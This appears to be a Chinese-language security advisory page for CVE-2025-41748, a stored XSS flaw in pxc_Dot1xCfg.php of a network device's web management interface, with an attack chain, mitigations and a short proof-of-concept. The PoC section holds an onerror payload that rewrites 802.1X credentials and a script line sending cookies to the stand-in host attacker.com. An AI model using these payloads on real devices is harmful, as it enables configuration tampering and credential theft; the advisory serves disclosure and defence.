IPBUF安全漏洞报告
English
CVE-2025-41748 CVSS 7.1 高危

CVE-2025-41748 pxc_Dot1xCfg.php存储型XSS漏洞

披露日期: 2025-12-09

漏洞信息

漏洞编号
CVE-2025-41748
漏洞类型
XSS跨站脚本
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
pxc_Dot1xCfg.php (Web Based Management)

相关标签

CVE-2025-41748XSS跨站脚本Web应用安全802.1XWBM网络设备存储型XSSPerlepxc_Dot1xCfg

漏洞概述

CVE-2025-41748是发现于pxc_Dot1xCfg.php文件中的一个存储型跨站脚本(XSS)漏洞。该漏洞允许未认证的远程攻击者通过社会工程学手段,诱骗已认证用户点击恶意链接,从而在用户浏览器中执行任意JavaScript代码。攻击者可借此篡改Web基于管理(WBM)界面中的设备配置参数。由于session cookie设置了httpOnly标志,攻击者无法直接窃取用户会话,但可以通过XSSPayload修改用户可见的配置内容。此漏洞影响仅限于设备配置参数范围内,不提供操作系统级资源或特权功能的访问权限。对于部署了此组件的网络设备,建议及时更新到厂商发布的安全补丁版本。

技术细节

该漏洞存在于pxc_Dot1xCfg.php的输入验证环节。攻击者构造包含恶意JavaScript代码的请求,当已认证用户访问包含该Payload的页面时,浏览器会执行注入的脚本。攻击者可利用此漏洞修改WBM中的802.1X配置参数,如端口认证设置、用户名密码等。CVSS 3.1评分7.1分,攻击向量为网络层面,无需认证即可发起攻击,但需要用户交互(点击链接)。由于配置参数存储在设备中,攻击具有持久性。防御关键是实现严格的输入过滤和输出编码,建议对所有用户输入使用HTML实体编码,并实施内容安全策略(CSP)。

攻击链分析

STEP 1
步骤1
攻击者识别目标设备上运行的存在漏洞的pxc_Dot1xCfg.php组件
STEP 2
步骤2
攻击者构造包含恶意JavaScript代码的XSS Payload
STEP 3
步骤3
攻击者通过钓鱼邮件、即时消息或其他社会工程手段诱骗已认证用户点击恶意链接
STEP 4
步骤4
用户点击链接后,恶意脚本在用户浏览器中执行,可读取页面内容并发起配置修改请求
STEP 5
步骤5
攻击者利用已认证用户的权限,通过XSS Payload修改WBM中的802.1X配置参数
STEP 6
步骤6
修改后的配置被设备保存,攻击达到持久化效果

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-41748 XSS PoC --> <!-- Attacker sends this payload to victim via social engineering --> <img src=x onerror=' var xhr = new XMLHttpRequest(); xhr.open("POST", "/pxc_Dot1xCfg.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("dot1x_enabled=1&username=attacker&password=malicious"); '> <!-- Stored XSS Payload Example --> <script>document.location="http://attacker.com/log?cookie="+document.cookie</script> <!-- Mitigation: Input sanitization and output encoding should prevent this -->

影响范围

pxc_Dot1xCfg.php 所有版本(截至2025-12-09)

防御指南

临时缓解措施
在厂商发布正式补丁前,可采取以下临时缓解措施:1) 限制对WBM管理界面的访问,仅允许受信任的IP地址访问;2) 启用WBM的HTTPS模式并配置强认证;3) 监控管理员账户的配置变更日志;4) 对管理员进行安全意识培训,提醒不要点击可疑链接;5) 考虑使用网络分段隔离管理平面流量;6) 部署WAF规则检测和拦截XSS攻击特征。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表